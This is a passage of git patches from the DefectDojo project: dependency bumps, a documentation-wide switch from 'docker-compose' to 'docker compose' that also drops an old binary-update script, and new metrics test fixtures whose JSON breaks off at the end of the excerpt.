2024 12:48:31 -0500 Subject: [PATCH 37/62] Bump boto3 from 1.35.21 to 1.35.22 (#10935) Bumps [boto3](https://github.com/boto/boto3) from 1.35.21 to 1.35.22. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.21...1.35.22) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index c4856bd1b24..102c3e8e7cd 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.21 # Required for Celery Broker AWS (SQS) support +boto3==1.35.22 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From 83710a1c746840e0eb4357da69aaba2a2739f78c Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 20 Sep 2024 13:33:59 -0500 Subject: [PATCH 38/62] Bump ruff from 0.6.5 to 0.6.6 (#10942) Bumps [ruff](https://github.com/astral-sh/ruff) from 0.6.5 to 0.6.6. - [Release notes](https://github.com/astral-sh/ruff/releases) - [Changelog](https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md) - [Commits](https://github.com/astral-sh/ruff/compare/0.6.5...0.6.6) --- updated-dependencies: - dependency-name: ruff dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements-lint.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements-lint.txt b/requirements-lint.txt index d7a367aae58..8a66517d3b6 100644 --- a/requirements-lint.txt +++ b/requirements-lint.txt @@ -1 +1 @@ -ruff==0.6.5 \ No newline at end of file +ruff==0.6.6 \ No newline at end of file From 5ab0156b1a36bfaec695c784cb5d5826143df0b1 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 20 Sep 2024 13:55:26 -0500 Subject: [PATCH 39/62] Bump boto3 from 1.35.22 to 1.35.23 (#10941) Bumps [boto3](https://github.com/boto/boto3) from 1.35.22 to 1.35.23. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.22...1.35.23) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 102c3e8e7cd..322272f10aa 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.22 # Required for Celery Broker AWS (SQS) support +boto3==1.35.23 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From 8dfe3730f6d13850a12a3e0b95cbaeb1d6a82cfd Mon Sep 17 00:00:00 2001 From: kiblik <5609770+kiblik@users.noreply.github.com> Date: Fri, 20 Sep 2024 23:04:42 +0200 Subject: [PATCH 40/62] fix(docker compose): Use 'docker compose' everywhere (#10916) * fix(docker compose): Use 'docker compose' everywhere * Apply suggestions from code review Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --------- Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --- .github/ISSUE_TEMPLATE/bug_report.md | 2 +- .github/ISSUE_TEMPLATE/support_request.md | 2 +- docker/docker-compose-check.sh | 4 +- docker/extra_settings/README.md | 2 +- .../en/contributing/how-to-write-a-parser.md | 14 ++--- .../getting_started/running-in-production.md | 4 +- .../en/getting_started/upgrading/2.23.md | 2 +- .../en/getting_started/upgrading/2.30.md | 2 +- .../en/getting_started/upgrading/_index.md | 12 ++-- docs/content/en/integrations/jira.md | 6 +- .../en/integrations/ldap-authentication.md | 2 +- docs/content/en/usage/features.md | 10 +-- readme-docs/DOCKER.md | 62 +++---------------- tests/local-integration-tests.sh | 26 ++++---- 14 files changed, 53 insertions(+), 97 deletions(-) diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md index 713480dd33d..ba1ba50d658 100644 --- a/.github/ISSUE_TEMPLATE/bug_report.md +++ b/.github/ISSUE_TEMPLATE/bug_report.md @@ -36,7 +36,7 @@ A clear and concise description of what you expected to happen. - DefectDojo version (see footer) or commit message: [use `git show -s --format="[%ci] %h: %s [%d]"`] **Logs** -Use `docker-compose logs` (or similar, depending on your deployment method) to get the logs and add the relevant sections here showing the error occurring (if applicable). +Use `docker compose logs` (or similar, depending on your deployment method) to get the logs and add the relevant sections here showing the error occurring (if applicable). **Sample scan files** If applicable, add sample scan files to help reproduce your problem. diff --git a/.github/ISSUE_TEMPLATE/support_request.md b/.github/ISSUE_TEMPLATE/support_request.md index 7eda2a58dea..4dc3873471f 100644 --- a/.github/ISSUE_TEMPLATE/support_request.md +++ b/.github/ISSUE_TEMPLATE/support_request.md @@ -36,7 +36,7 @@ A clear and concise description of what you expected to happen. - DefectDojo version (see footer) or commit message: [use `git show -s --format="[%ci] %h: %s [%d]"`] **Logs** -Use `docker-compose logs` (or similar, depending on your deployment method) to get the logs and add the relevant sections here showing the error occurring (if applicable). +Use `docker compose logs` (or similar, depending on your deployment method) to get the logs and add the relevant sections here showing the error occurring (if applicable). **Sample scan files** If applicable, add sample scan files to help reproduce your problem. diff --git a/docker/docker-compose-check.sh b/docker/docker-compose-check.sh index b51cf45674f..d24419de2ee 100755 --- a/docker/docker-compose-check.sh +++ b/docker/docker-compose-check.sh @@ -6,11 +6,11 @@ current=$(docker compose version --short) echo 'Checking docker compose version' if [[ $main -lt 2 ]]; then - echo "$current is not a supported docker-compose version, please upgrade to the minimum supported version: 2.0" + echo "$current is not a supported 'docker compose' version, please upgrade to the minimum supported version: 2.0" exit 1 elif [[ $main -eq 1 ]]; then if [[ $minor -lt 28 ]]; then - echo "$current is not supported docker-compose version, please upgrade to minimal supported version:1.28" + echo "$current is not supported 'docker compose' version, please upgrade to minimal supported version:1.28" exit 1 fi fi diff --git a/docker/extra_settings/README.md b/docker/extra_settings/README.md index e919e1917bc..b3a8fc0eddb 100644 --- a/docker/extra_settings/README.md +++ b/docker/extra_settings/README.md @@ -6,7 +6,7 @@ If a file if placed here, it will be copied on startup to `dojo/settings/local_s For an example, see [template-local_settings](../../dojo/settings/template-local_settings) Please note this copy action could fail if you have mounted the full `dojo/` folder, but that is owned by a different user/group. -That's why this copy action only happens in docker-compose release mode, and not in dev/debug/unit_tests/integration_tests modes. +That's why this copy action only happens in docker compose release mode, and not in dev/debug/unit_tests/integration_tests modes. For advanced usage you can also place a `settings.dist.py` or `settings.py` file. These will also be copied on startup to dojo/settings. diff --git a/docs/content/en/contributing/how-to-write-a-parser.md b/docs/content/en/contributing/how-to-write-a-parser.md index 7495f7ba886..c87846cb620 100644 --- a/docs/content/en/contributing/how-to-write-a-parser.md +++ b/docs/content/en/contributing/how-to-write-a-parser.md @@ -15,7 +15,7 @@ All commands assume that you're located at the root of the django-DefectDojo clo - Checkout `dev` and make sure you're up to date with the latest changes. - It's advised that you create a dedicated branch for your development, such as `git checkout -b parser-name`. -It is easiest to use the docker-compose deployment as it has hot-reload capbility for uWSGI. +It is easiest to use the docker compose deployment as it has hot-reload capbility for uWSGI. Set up your environment to use the debug environment: `$ docker/setEnv.sh debug` @@ -27,7 +27,7 @@ Please have a look at [DOCKER.md](https://github.com/DefectDojo/django-DefectDoj You will want to build your docker images locally, and eventually pass in your local user's `uid` to be able to write to the image (handy for database migration files). Assuming your user's `uid` is `1000`, then: {{< highlight bash >}} -$ docker-compose build --build-arg uid=1000 +$ docker compose build --build-arg uid=1000 {{< /highlight >}} ## Which files do you need to modify? @@ -279,7 +279,7 @@ This ensures the file is closed at the end of the with statement, even if an exc ### Test database -To test your unit tests locally, you first need to grant some rights. Get your MySQL root password from the docker-compose logs, login as root and issue the following commands: +To test your unit tests locally, you first need to grant some rights. Get your MySQL root password from the docker compose logs, login as root and issue the following commands: {{< highlight mysql >}} MYSQL> grant all privileges on test_defectdojo.* to defectdojo@'%'; @@ -291,17 +291,17 @@ MYSQL> flush privileges; This local command will launch the unit test for your new parser {{< highlight bash >}} -$ docker-compose exec uwsgi bash -c 'python manage.py test unittests.tools.. -v2' +$ docker compose exec uwsgi bash -c 'python manage.py test unittests.tools.. -v2' {{< /highlight >}} Example for the blackduck hub parser: {{< highlight bash >}} -$ docker-compose exec uwsgi bash -c 'python manage.py test unittests.tools.test_blackduck_csv_parser.TestBlackduckHubParser -v2' +$ docker compose exec uwsgi bash -c 'python manage.py test unittests.tools.test_blackduck_csv_parser.TestBlackduckHubParser -v2' {{< /highlight >}} {{% alert title="Information" color="info" %}} -If you want to run all unit tests, simply run `$ docker-compose exec uwsgi bash -c 'python manage.py test unittests -v2'` +If you want to run all unit tests, simply run `$ docker compose exec uwsgi bash -c 'python manage.py test unittests -v2'` {{% /alert %}} ### Endpoint validation @@ -330,7 +330,7 @@ In the event where you'd have to change the model, e.g. to increase a database c * Create a new migration file in dojo/db_migrations by running and including as part of your PR {{< highlight bash >}} - $ docker-compose exec uwsgi bash -c 'python manage.py makemigrations -v2' + $ docker compose exec uwsgi bash -c 'python manage.py makemigrations -v2' {{< /highlight >}} ### Accept a different type of file to upload diff --git a/docs/content/en/getting_started/running-in-production.md b/docs/content/en/getting_started/running-in-production.md index 6da16d253b7..4074acb8df0 100644 --- a/docs/content/en/getting_started/running-in-production.md +++ b/docs/content/en/getting_started/running-in-production.md @@ -5,7 +5,7 @@ draft: false weight: 4 --- -## Production use with docker-compose +## Production use with docker compose The docker-compose.yml file in this repository is fully functional to evaluate DefectDojo in your local environment. @@ -76,7 +76,7 @@ Dockerfile.django-* for in-file references. You can execute the following command to see the configuration: -`docker-compose exec celerybeat bash -c "celery -A dojo inspect stats"` +`docker compose exec celerybeat bash -c "celery -A dojo inspect stats"` and see what is in effect. #### Asynchronous Import diff --git a/docs/content/en/getting_started/upgrading/2.23.md b/docs/content/en/getting_started/upgrading/2.23.md index 5ebcc4edc61..5525d10ce01 100644 --- a/docs/content/en/getting_started/upgrading/2.23.md +++ b/docs/content/en/getting_started/upgrading/2.23.md @@ -16,6 +16,6 @@ There is a migration process built into the upgrade that will automatically conv - If your deployment uses the MySQL containerized database, please see the following updates to run DefectDojo: - Use of the helper script "dc-up": `./dc-up.sh mysql-rabbitmq` or `./dc-up.sh mysql-redis` - Use of the helper script "dc-up-d": `./dc-up-d.sh mysql-rabbitmq` or `./dc-up-d.sh mysql-redis` - - Use of Docker Compose directly: `docker-compose --profile mysql-rabbitmq --env-file ./docker/environments/mysql-rabbitmq.env up` or `docker-compose --profile mysql-redis --env-file ./docker/environments/mysql-redis.env up` + - Use of Docker Compose directly: `docker compose --profile mysql-rabbitmq --env-file ./docker/environments/mysql-rabbitmq.env up` or `docker compose --profile mysql-redis --env-file ./docker/environments/mysql-redis.env up` For all other changes, check the [Release Notes](https://github.com/DefectDojo/django-DefectDojo/releases/tag/2.23.0) for the contents of the release. diff --git a/docs/content/en/getting_started/upgrading/2.30.md b/docs/content/en/getting_started/upgrading/2.30.md index 6029febd302..b2a0bc66087 100644 --- a/docs/content/en/getting_started/upgrading/2.30.md +++ b/docs/content/en/getting_started/upgrading/2.30.md @@ -10,7 +10,7 @@ There are instructions for upgrading to 2.30.0 if you disabled `enable_auditlog` Parameter `enable_auditlog` is not possible to set through System settings anymore. If you set this parameter or you need to change it to `False` (to disable audit logging), set environmental variable `DD_ENABLE_AUDITLOG` to `False`. -If you are using docker-compose, another EnvVar should be added to the `docker-compose.yml` file in all the containers ran by the django image. This should do the trick +If you are using docker compose, another EnvVar should be added to the `docker-compose.yml` file in all the containers ran by the django image. This should do the trick ```yaml DD_ENABLE_AUDITLOG: ${DD_ENABLE_AUDITLOG:-False} ``` diff --git a/docs/content/en/getting_started/upgrading/_index.md b/docs/content/en/getting_started/upgrading/_index.md index 9a57986deea..a7f5aa30906 100644 --- a/docs/content/en/getting_started/upgrading/_index.md +++ b/docs/content/en/getting_started/upgrading/_index.md @@ -5,9 +5,9 @@ draft: false weight: 5 --- -## Docker-compose +## Docker compose -When you deploy a vanilla docker-compose, it will create a persistent +When you deploy a vanilla docker compose, it will create a persistent volume for your Postgres database. As long as your volume is there, you should not lose any data. @@ -19,7 +19,7 @@ DockerHub to update. {{% /alert %}} -The generic upgrade method for docker-compose are as follows: +The generic upgrade method for docker compose are as follows: - Pull the latest version ``` {.sourceCode .bash} @@ -46,10 +46,10 @@ The generic upgrade method for docker-compose are as follows: - Re-start DefectDojo, allowing for container recreation: `./dc-up-d.sh` - Database migrations will be run automatically by the initializer. - Check the output via `docker-compose logs initializer` or relevant k8s command + Check the output via `docker compose logs initializer` or relevant k8s command - If you have the initializer disabled (or if you want to be on the safe side), run the migration command: - `docker-compose exec uwsgi /bin/bash -c "python manage.py migrate"` + `docker compose exec uwsgi /bin/bash -c "python manage.py migrate"` ### Building your local images @@ -64,7 +64,7 @@ first. git merge origin/master ``` -Then replace the first step of the above generic upgrade method for docker-compose with: `docker-compose build` +Then replace the first step of the above generic upgrade method for docker compose with: `docker compose build` ## godojo installations diff --git a/docs/content/en/integrations/jira.md b/docs/content/en/integrations/jira.md index e7a19329bd4..b6bc83fe206 100644 --- a/docs/content/en/integrations/jira.md +++ b/docs/content/en/integrations/jira.md @@ -167,19 +167,19 @@ optional arguments: This can be executed from the uwsgi docker container using: {{< highlight bash >}} -$ docker-compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation' +$ docker compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation' {{< /highlight >}} DEBUG output can be obtains via `-v 3`, but only after increasing the logging to DEBUG level in your settings.dist.py or local_settings.py file {{< highlight bash >}} -$ docker-compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation -v 3' +$ docker compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation -v 3' {{< /highlight >}} At the end of the command a semicolon seperated CSV summary will be printed. This can be captured by redirecting stdout to a file: {{< highlight bash >}} -$ docker-compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation > jira_reconciliation.csv' +$ docker compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation > jira_reconciliation.csv' {{< /highlight >}} diff --git a/docs/content/en/integrations/ldap-authentication.md b/docs/content/en/integrations/ldap-authentication.md index 17697043736..307f1029a0a 100644 --- a/docs/content/en/integrations/ldap-authentication.md +++ b/docs/content/en/integrations/ldap-authentication.md @@ -116,7 +116,7 @@ Read the docs for Django Authentication with LDAP here: https://django-auth-ldap #### docker-compose.yml -In order to pass the variables to the settings.dist.py file via docker, it's a good idea to add these to the docker-compose file. +In order to pass the variables to the settings.dist.py file via docker, it's a good idea to add these to the docker compose file. You can do this by adding the following variables to the environment section for the uwsgi image: ```yaml diff --git a/docs/content/en/usage/features.md b/docs/content/en/usage/features.md index f1020ffd4c0..5f99f34023f 100644 --- a/docs/content/en/usage/features.md +++ b/docs/content/en/usage/features.md @@ -357,7 +357,7 @@ to the hashcode configuration or calculation logic. We will mention this in the To regenerate the hashcodes, use the `dedupe` management command: {{< highlight bash >}} -docker-compose exec uwsgi ./manage.py dedupe --hash_code_only +docker compose exec uwsgi ./manage.py dedupe --hash_code_only {{< / highlight >}} This will only regenerated the hashcodes, but will not run any deduplication logic on existing findings. @@ -365,14 +365,14 @@ If you want to run deduplication again on existing findings to make sure any dup hashcode config are marked as such, run: {{< highlight bash >}} -docker-compose exec uwsgi ./manage.py dedupe +docker compose exec uwsgi ./manage.py dedupe {{< / highlight >}} The deduplication part of this command will run the deduplication for each finding in a celery task. If you want to run the deduplication in the foreground process, use: {{< highlight bash >}} -docker-compose exec uwsgi ./manage.py dedupe --dedupe_sync +docker compose exec uwsgi ./manage.py dedupe --dedupe_sync {{< / highlight >}} Please note the deduplication process is resource intensive and can take a long time to complete @@ -502,10 +502,10 @@ You can of course change this default by modifying that stanza. ### Launching from the CLI You can also invoke the SLA notification function from the CLI. For -example, if run from docker-compose: +example, if run from docker compose: {{< highlight bash >}} -$ docker-compose exec uwsgi /bin/bash -c 'python manage.py sla_notifications' +$ docker compose exec uwsgi /bin/bash -c 'python manage.py sla_notifications' {{< / highlight >}} ## Reports diff --git a/readme-docs/DOCKER.md b/readme-docs/DOCKER.md index d757f8eb810..a85d9f55f26 100644 --- a/readme-docs/DOCKER.md +++ b/readme-docs/DOCKER.md @@ -8,7 +8,7 @@ Although Docker Compose is one of the supported installation methods to deploy a # Prerequisites * Docker version - * Installing with docker-compose requires at least Docker 19.03.0 and Docker Compose 1.28.0. See "Checking Docker versions" below for version errors during running docker-compose. + * Installing with docker compose requires at least Docker 19.03.0 and Docker Compose 1.28.0. See "Checking Docker versions" below for version errors during running docker compose. * Proxies * If you're behind a corporate proxy check https://docs.docker.com/network/proxy/ . @@ -100,7 +100,7 @@ This will run the application based on merged configurations from docker-compose * Hot-reloading for the **celeryworker** container is not yet implemented. When working on deduplication for example, restart the celeryworker container with: ``` -docker-compose restart celeryworker +docker compose restart celeryworker ``` * The postgres port is forwarded to the host so that you can access your database from outside the container. @@ -126,7 +126,7 @@ To find out the admin password, check the very beginning of the console output of the initializer container by running: ```zsh -docker-compose logs initializer | grep "Admin password:" +docker compose logs initializer | grep "Admin password:" ``` Make sure you write down the first password generated as you'll need it when re-starting the application. @@ -141,7 +141,7 @@ docker exec -it django-defectdojo-uwsgi-1 ./manage.py changepassword admin ``` # Logging -For docker-compose release mode the log level is INFO. In the other modes the log level is DEBUG. Logging is configured in `settings.dist.py` and can be tuned using a `local_settings.py`, see [template for local_settings.py](dojo/settings/template-local_settings). For example the deduplication logger can be set to DEBUG in a local_settings.py file: +For docker compose release mode the log level is INFO. In the other modes the log level is DEBUG. Logging is configured in `settings.dist.py` and can be tuned using a `local_settings.py`, see [template for local_settings.py](dojo/settings/template-local_settings). For example the deduplication logger can be set to DEBUG in a local_settings.py file: ``` @@ -251,7 +251,7 @@ To change the port: - update `docker-compose.override.https.yml` or set DD_TLS_PORT in the environment) - restart the application -NB: some third party software may require to change the exposed port in Dockerfile.nginx as they use docker-compose declarations to discover which ports to map when publishing the application. +NB: some third party software may require to change the exposed port in Dockerfile.nginx as they use docker compose declarations to discover which ports to map when publishing the application. # Run the tests with Docker Compose @@ -324,7 +324,7 @@ docker logs -f django-defectdojo_integration-tests_1 # Checking Docker versions -Run the following to determine the versions for docker and docker-compose: +Run the following to determine the versions for docker and docker compose: ```zsh $ docker version @@ -345,58 +345,14 @@ Server: OS/Arch: linux/amd64 Experimental: false -$ docker-compose version -docker-compose version 1.18.0, build 8dd22a9 +$ docker compose version +Docker Compose version 1.18.0, build 8dd22a9 docker-py version: 2.6.1 CPython version: 2.7.13 OpenSSL version: OpenSSL 1.0.1t 3 May 2016 ``` -In this case, both docker (version 17.09.0-ce) and docker-compose (1.18.0) need to be updated. +In this case, both docker (version 17.09.0-ce) and docker compose (1.18.0) need to be updated. Follow [Docker's documentation](https://docs.docker.com/install/) for your OS to get the latest version of Docker. For the docker command, most OSes have a built-in update mechanism like "apt upgrade". -Docker Compose isn't packaged like Docker and you'll need to manually update an existing install if using Linux. For Linux, either follow the instructions in the [Docker Compose documentation](https://docs.docker.com/compose/install/) or use the shell script below. The script below will update docker-compose to the latest version automatically. You will need to make the script executable and have sudo privileges to upgrade docker-compose: - -```zsh -#!/bin/bash - -# Set location of docker-compose binary - shouldn't need to modify this -DESTINATION=/usr/local/bin/docker-compose - -# Get latest docker-compose version -VERSION=$(curl --silent https://api.github.com/repos/docker/compose/releases/latest | jq .name -r) - -# Output some info on what this is going to do -echo "Note: docker-compose version $VERSION will be downloaded from:" -echo "https://github.com/docker/compose/releases/download/${VERSION}/docker-compose-$(uname -s)-$(uname -m)" -echo "Enter sudo password to install docker-compose" - -# Download and install latest docker compose -sudo curl -L https://github.com/docker/compose/releases/download/${VERSION}/docker-compose-$(uname -s)-$(uname -m) -o $DESTINATION -sudo chmod +x $DESTINATION - -# Output new docker-compose version info -echo "" -docker-compose version -``` - -Running the script above will look like: - -```zsh -$ vi update-docker-compose -$ chmod u+x update-docker-compose -$ ./update-docker-compose -Note: docker-compose version 1.24.0 will be downloaded from: -https://github.com/docker/compose/releases/download/1.24.0/docker-compose-Linux-x86_64 -Enter sudo password to install docker-compose - % Total % Received % Xferd Average Speed Time Time Time Current - Dload Upload Total Spent Left Speed -100 617 0 617 0 0 1778 0 --:--:-- --:--:-- --:--:-- 1778 -100 15.4M 100 15.4M 0 0 2478k 0 0:00:06 0:00:06 --:--:-- 2910k - -docker-compose version 1.24.0, build 0aa59064 -docker-py version: 3.7.2 -CPython version: 3.6.8 -OpenSSL version: OpenSSL 1.1.0j 20 Nov 2018 -``` diff --git a/tests/local-integration-tests.sh b/tests/local-integration-tests.sh index afbb624f946..db814125321 100755 --- a/tests/local-integration-tests.sh +++ b/tests/local-integration-tests.sh @@ -12,7 +12,7 @@ echo "Running Product type integration tests" if python3 tests/regulations_test.py ; then echo "Success: Regulation integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Regulation integration test failed."; exit 1 fi @@ -20,7 +20,7 @@ echo "Running Product type integration tests" if python3 tests/product_type_test.py ; then echo "Success: Product type integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Product type integration test failed."; exit 1 fi @@ -28,7 +28,7 @@ echo "Running Product integration tests" if python3 tests/product_test.py ; then echo "Success: Product integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Product integration test failed"; exit 1 fi @@ -36,7 +36,7 @@ echo "Running Dedupe integration tests" if python3 tests/dedupe_test.py ; then echo "Success: Dedupe integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Dedupe integration test failed"; exit 1 fi @@ -44,7 +44,7 @@ echo "Running Endpoint integration tests" if python3 tests/endpoint_test.py ; then echo "Success: Endpoint integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Endpoint integration test failed"; exit 1 fi @@ -52,7 +52,7 @@ echo "Running Engagement integration tests" if python3 tests/engagement_test.py ; then echo "Success: Engagement integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Engagement integration test failed"; exit 1 fi @@ -60,7 +60,7 @@ echo "Running Environment integration tests" if python3 tests/environment_test.py ; then echo "Success: Environment integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Environment integration test failed"; exit 1 fi @@ -68,7 +68,7 @@ echo "Running Finding integration tests" if python3 tests/finding_test.py ; then echo "Success: Finding integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Finding integration test failed"; exit 1 fi @@ -76,7 +76,7 @@ echo "Running Test integration tests" if python3 tests/test_test.py ; then echo "Success: Test integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Test integration test failed"; exit 1 fi @@ -84,7 +84,7 @@ echo "Running User integration tests" if python3 tests/user_test.py ; then echo "Success: User integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: User integration test failed"; exit 1 fi @@ -92,7 +92,7 @@ echo "Running Ibm Appscan integration test" if python3 tests/ibm_appscan_test.py ; then echo "Success: Ibm AppScan integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Ibm AppScan integration test failed"; exit 1 fi @@ -100,7 +100,7 @@ echo "Running Report Builder integration tests" if python3 tests/report_builder_test.py ; then echo "Success: Report Builder integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Report Builder integration test failed."; exit 1 fi @@ -108,7 +108,7 @@ echo "Running Search integration test" if python3 tests/search_test.py ; then echo "Success: Search integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Search integration test failed"; exit 1 fi From e948cde47659b64a8e2133efa25f6e3da2c01372 Mon Sep 17 00:00:00 2001 From: dogboat Date: Fri, 20 Sep 2024 17:09:12 -0400 Subject: [PATCH 41/62] Metrics findings tests (#10930) * metrics-findings-tests some work on updating metrics findings tests; includes some changes to metrics utils to improve readability and adjust timeframes returned for data sets * metrics-findings-tests linter fixes on metrics unittest * metrics-findings-tests linter fix on metrics utils * metrics-findings-tests tweaking tests * metrics-findings-tests undo fixtures changes * metrics-findings-tests add new test data * metrics-findings-tests fix fixtures * metrics-findings-tests update tests * metrics-findings-tests linter fixes * metrics-findings-tests move new metrics finding data to its own fixture --- .../unit_metrics_additional_data.json | 482 ++++++++++++++++++ dojo/metrics/utils.py | 72 +-- dojo/static/dojo/js/metrics.js | 16 +- unittests/test_metrics_queries.py | 114 +++-- 4 files changed, 601 insertions(+), 83 deletions(-) create mode 100644 dojo/fixtures/unit_metrics_additional_data.json diff --git a/dojo/fixtures/unit_metrics_additional_data.json b/dojo/fixtures/unit_metrics_additional_data.json new file mode 100644 index 00000000000..721e47eaac6 --- /dev/null +++ b/dojo/fixtures/unit_metrics_additional_data.json @@ -0,0 +1,482 @@ +[ + { + "pk": 240, + "model": "dojo.finding", + "fields": { + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2018-01-01", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "High", + "false_p": false, + "verified": false, + "severity": "High", + "title": "High Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": true, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 3, + "out_of_scope": false, + "cwe": null, + "file_path": "", + "duplicate_finding": 2, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": true, + "line": null, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", + "last_reviewed": null + } + }, + { + "pk": 241, + "model": "dojo.finding", + "fields": { + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2018-01-01", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "High", + "false_p": false, + "verified": false, + "severity": "High", + "title": "High Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": true, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 3, + "out_of_scope": false, + "cwe": null, + "file_path": "", + "duplicate_finding": 2, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": false, + "line": null, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", + "last_reviewed": null, + "risk_accepted": true + } + }, + { + "pk": 242, + "model": "dojo.finding", + "fields": { + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2018-01-01", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "High", + "false_p": false, + "verified": false, + "severity": "High", + "title": "High Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": true, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 3, + "out_of_scope": false, + "cwe": null, + "file_path": "", + "duplicate_finding": 2, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": false, + "line": null, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", + "last_reviewed": null, + "risk_accepted": true + } + }, + { + "pk": 243, + "model": "dojo.finding", + "fields": { + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2017-12-31", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "High", + "false_p": false, + "verified": false, + "severity": "High", + "title": "DUMMY FINDING", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": false, + "mitigation": "MITIGATION", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 3, + "out_of_scope": false, + "cwe": 1, + "file_path": "", + "duplicate_finding": null, + "description": "TEST finding", + "mitigated_by": null, + "reporter": 2, + "mitigated": null, + "active": false, + "line": 100, + "under_review": false, + "defect_review_requested_by": 2, + "review_requested_by": 2, + "thread_id": 1, + "url": "http://www.example.com", + "notes": [ + 1 + ], + "dynamic_finding": false, + "hash_code": "c89d25e445b088ba339908f68e15e3177b78d22f3039d1bfea51c4be251bf4e0", + "last_reviewed": null, + "risk_accepted": true, + "is_mitigated": true + } + }, + { + "pk": 244, + "model": "dojo.finding", + 